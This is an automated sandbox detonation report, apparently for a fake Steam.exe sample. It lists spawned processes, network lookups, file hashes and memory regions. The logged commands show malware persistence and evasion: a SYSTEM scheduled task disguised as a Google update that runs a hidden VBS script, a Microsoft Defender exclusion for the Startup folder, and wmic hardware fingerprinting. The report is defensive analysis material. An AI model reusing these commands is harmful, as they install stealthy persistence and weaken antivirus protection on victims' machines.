"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Users\Admin\AppData\Local\Temp\Steam.exe
"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wininit.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\wininit.exe
"C:\Windows\system32\wininit.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49758 | N/A | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\f1488582-d6b7-497c-9bf5-c48c7a80f6cf.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzfzesfy.ged.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2488-14-0x00000251CA150000-0x00000251CA172000-memory.dmp
memory/2488-15-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
memory/2488-16-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
memory/2488-17-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
memory/2488-18-0x00000251CA210000-0x00000251CA260000-memory.dmp
memory/2488-22-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f10a836b72e0bf0946a8e1cd5fadce2c |
| SHA1 | 586b63a56f0eb3e84be0cca2aa83a3ad66ad268e |
| SHA256 | 5e314ed17c2e2997a8ffde8d3d68a05004fb29659ad1a10e698f04462a9d69d5 |
| SHA512 | 1ecfe04091c336147e372ea24defeeb0c965ad2a02f64e4c6f64edf25a1cf289b02456c782fd3a9a6f401f947fd07125c36c9bbcb5eff4ac11d2b99b5c3827fd |
memory/4852-33-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
memory/4852-35-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7a2b288b6516ace3c60a8b6718511f0a |
| SHA1 | 7783140c099db9de2dcc5d5fc4ac79105e41f707 |
| SHA256 | 921c27cf4a64523fdcaa3f724a90a5f635da1f05541b7c6bcce9b5a892909ce9 |
| SHA512 | 56d57c9c46be4fef39b6d1a0cc5b769eec05f42a08323b41c222096831be315009860d4bd3d7dc5833887845d11806cf2eef24ce7e24888c2c30777f6918974f |
memory/4852-37-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
memory/4852-36-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
memory/4852-40-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs
| MD5 | 849a5123f73771f6fe0e36056813e7cb |
| SHA1 | ccf4436fccf38a27cabf2603e61557976dbe3b01 |
| SHA256 | e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870 |
| SHA512 | 1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd |
C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat
| MD5 | 79a5e87823b83ea148f718b5fe237ec9 |
| SHA1 | 408431f7d062aef5017f2ce715b2da16a8585fa8 |
| SHA256 | 0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1 |
| SHA512 | 2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8 |
memory/4796-71-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
memory/4796-72-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
memory/1412-74-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
memory/1412-73-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
memory/4796-80-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 14bb94c36d909375f4a2c1163c1780fb |
| SHA1 | 02ff6e3a0293fe7428499390adacc96862e17d91 |
| SHA256 | e291bdfc4667f621131172b199039aa4147404efa429ad54482073b4e46c391a |
| SHA512 | 9241b39e96e443a40e9cb59b5db5f8e5724203742ecdad77f147bb59360fdf7d198ad49c44682d707fe3ab77b5cd01b1d9c27cfc8e3900ea2a99fad9a26cb0b6 |
memory/1412-93-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
memory/1412-94-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
88s
Max time network
100s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.48:443 | N/A | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
90s
Max time network
100s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |